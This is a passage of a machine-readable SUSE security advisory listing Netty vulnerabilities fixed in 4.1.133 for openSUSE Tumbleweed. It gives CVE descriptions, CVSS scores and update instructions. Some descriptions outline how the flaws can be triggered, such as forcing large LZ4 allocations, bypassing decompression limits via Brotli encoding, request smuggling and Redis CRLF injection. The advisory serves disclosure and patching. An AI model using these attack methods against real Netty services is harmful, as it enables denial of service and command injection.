"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42583"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42583",
"url": "https://www.suse.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "SUSE Bug 1265279 for CVE-2026-42583",
"url": "https://bugzilla.suse.com/1265279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42584"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u0027s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42584",
"url": "https://www.suse.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "SUSE Bug 1265280 for CVE-2026-42584",
"url": "https://bugzilla.suse.com/1265280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42585"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42585",
"url": "https://www.suse.com/security/cve/CVE-2026-42585"
},
{
"category": "external",
"summary": "SUSE Bug 1265291 for CVE-2026-42585",
"url": "https://bugzilla.suse.com/1265291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42586"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the Netty Redis codec encoder (RedisEncoder) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (\\r\\n) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42586",
"url": "https://www.suse.com/security/cve/CVE-2026-42586"
},
{
"category": "external",
"summary": "SUSE Bug 1265245 for CVE-2026-42586",
"url": "https://bugzilla.suse.com/1265245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42587"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42587",
"url": "https://www.suse.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "SUSE Bug 1265246 for CVE-2026-42587",
"url": "https://bugzilla.suse.com/1265246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44248"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the MQTT 5 header Properties section is parsed and buffered before any message size limit is applied. Specifically, in MqttDecoder, the decodeVariableHeader() method is called before the bytesRemainingBeforeVariableHeader \u003e maxBytesInMessage check. The decodeVariableHeader() can call other methods which will call decodeProperties(). Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because MqttDecoder extends ReplayingDecoder, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44248",
"url": "https://www.suse.com/security/cve/CVE-2026-44248"
},
{
"category": "external",
"summary": "SUSE Bug 1265293 for CVE-2026-44248",
"url": "https://bugzilla.suse.com/1265293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
